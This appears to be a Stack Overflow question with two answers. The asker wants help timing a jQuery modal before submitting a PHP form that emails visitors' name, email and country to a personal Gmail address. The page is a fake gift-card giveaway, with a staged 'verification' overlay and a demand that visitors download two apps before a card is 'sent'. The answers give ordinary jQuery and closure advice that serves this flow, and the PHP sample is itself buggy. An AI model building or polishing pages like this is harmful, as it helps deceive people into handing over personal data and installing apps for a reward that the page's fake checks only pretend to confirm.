# load css modal after form submit

Tags: javascript, php, css, html

I have tried to find JS and ajax solutions for my code but none of them works
I want after the user click on the submit button then the modal loads and only after the modal loads, send the form & submit values to email .
I tried so many times but I can't succeed so if any one can help me to solve This its will be really nice.
This is my code.

```js
$(document).ready(function() {
  $('#questionWrapper .question').first().show(); //show first questionblock

  $("#questionWrapper .answer").click(function(event) {
    event.preventDefault();
    $(this).parent('.question').hide();
    if ($(this).parent().next('.question').length) {
      $(this).parent().next('.question').fadeIn();
    } else {
      startCheck();
    }
  });
});

function startCheck() {

  var overlay = $('.overlay-checker'),
    points = $('.overlay-checker-points > li');

  // Initially, hide all the points so we can show them one by one
  points.hide();

  // Fade in the overlay
  overlay.fadeIn();

  // Loop points.lenght times (so through every point)
  for (i = 0; i < points.length; i++) {
    setTimeout(function() {
      $('.overlay-checker-points').find(':hidden').first().fadeIn();
    }, 1500 * (i + 1));
  }

  // After all items have been faded in, redirect
  setTimeout(function() {

    document.getElementById('overlay-checker').click();
  }, 1500 * points.length + 4000);

}


function toggleDiv(target) {
  $(target).toggle();
}
```

```css
<?php
/*
From http://www.html-form-guide.com 
This is the simplest emailer one can have in PHP.
If this does not work, then the PHP email configuration is bad!
*/
$msg="";
if(isset($_POST['submit']))
{
    /* ****Important!****
    replace name@your-web-site.com below 
    with an email address that belongs to 
    the website where the script is uploaded.
    For example, if you are uploading this script to
    www.my-web-site.com, then an email like
    form@my-web-site.com is good.
    */
    $lname=$_POST['name'];
    $email=$_POST['email'];
    $country=$_POST['country'];
    
    

 $from_add = "useremail"; 

 $to_add = "myemail@gmail.com"; //<-- put your yahoo/gmail email address here

 $subject = "Form User Submmitted";
 $message = "<html><head>
        <title>Message</title>
    </head>
    <body>
        <p><strong>From:</strong> $name</p>
        <p><strong>Email:</strong> $email</p>
        <p><strong>Country:</strong> $country</p>
                
    </body>
</html>";

mail($to_add, $subject, $message, $headers);
 
 
 $headers = "From: $from_add \r\n";
 $headers .= "Reply-To: $from_add \r\n";
 $headers .= "Return-Path: $from_add\r\n";
 $headers .= "X-Mailer: PHP \r\n";
 $headers .= "Content-Type: text/html; charset=UTF-8\r\n";
 $headers .= "MIME-Version: 1.0\r\n";
 
 
 if(mail($to_add,$subject,$message,$headers)) 
 {
  header('Location: google.com');
 } 
 else 
 {
     header('Location: google.uk');
 }
}
?>
```

```html
      <div id="form-div">
<form class="form" method="post" id="form1" action=refreshform.php>
  
  <p class="name">
    <input name="name" type="text" class="validate[required,custom[onlyLetter],length[0,100]] feedback-input" placeholder="Name" id="name" />
  </p>
  
  <p class="email">
    <input name="email" type="text" class="validate[required,custom[email]] feedback-input" id="email" placeholder="Email" />
  </p>
    
    <p class="country">
    <input name="country" type="text" class="validate[required,custom[onlyLetter],length[0,100]] feedback-input" placeholder="Country" id="country" />
  </p>
    <p class="apps">to ensure your not a bot <strong>you must download 2 FREE Apps</strong> and only after the GiftCard will be Sent.</p>
  
  
  
  
  <div class="answer">
    <input class="submit" name="submit" type="submit" value="Check & Verify" id="blue-button"/>
    <div class="ease"></div>
  </div>
</form>
                
         </center>       
  </div>
 </div> <!--End of questionWrapper .alpha60-->
  </div> <!--End of wrapper-->


  <div class="overlay-checker">
<div class="centerIt">Checking your answers...

  <ul class="overlay-checker-points centerIt">
    <li><img src="img/check.png"> No double registrations found on IP.</li>
    <li><img src="img/check.png"> <span style="color: red; font-size: 28px;">2 </span>Card is available.</li>
    <li><img src="img/check.png"> Congratulations. Please proceed to App Download Verification...</li>
  </ul>

  <div class="terms">Additional T&amp;C may apply.</div>

</div>
  </div>
```

Answer (score 0, accepted):

You could have your submit button call a JavaScript method to open your modal,  then call $("form").submit ()
https://api.jquery.com/submit/

Comment: So do you mean take the startcheck func to button submit and afterwards in this func to make the subbmition ?

Comment: Correct. The actual submit would be done from JavaScript  after the modal is displayed. Your  submit button would just be a button with a click handler attached.

Comment: can you please explain to me this on my code i cant get this to work i dont know why

Comment: So after the fadein, you want the submission to occur, correct? If so, you can pass a function callback for when fadein is complete and submit the form there. http://api.jquery.com/fadein/ you may also want to stop propagation on the click event.

Comment: i commended as answer what i tried sorry im new to stackoverflow

Comment: I'm new as well... Are you having the problem that the form submits before you are ready using your answer, or that the submit doesn't happen? If it is not sending the email,  make sure you are sending submit=submit with your .submit () request.

Answer (score 0):

You could just try ***closure*** in your for loop try below example so you will have idea how to resolve this issue.

1)

```
for (var i = 0; i <= 3; i++)
{
  setTimeout(function() { console.log(i) }, 1000);
}
```

result is 4 but this should be 0 1 2 3

2) now just put a closure

```
for (var i = 0; i <= 3; i++)
{
  (function(index){
    setTimeout(function() { console.log(index) }, 1000);
  })(i);
}
```

then the result is 0 1 2 3

thanks

Comment: I don't familiar with this language (also new to js)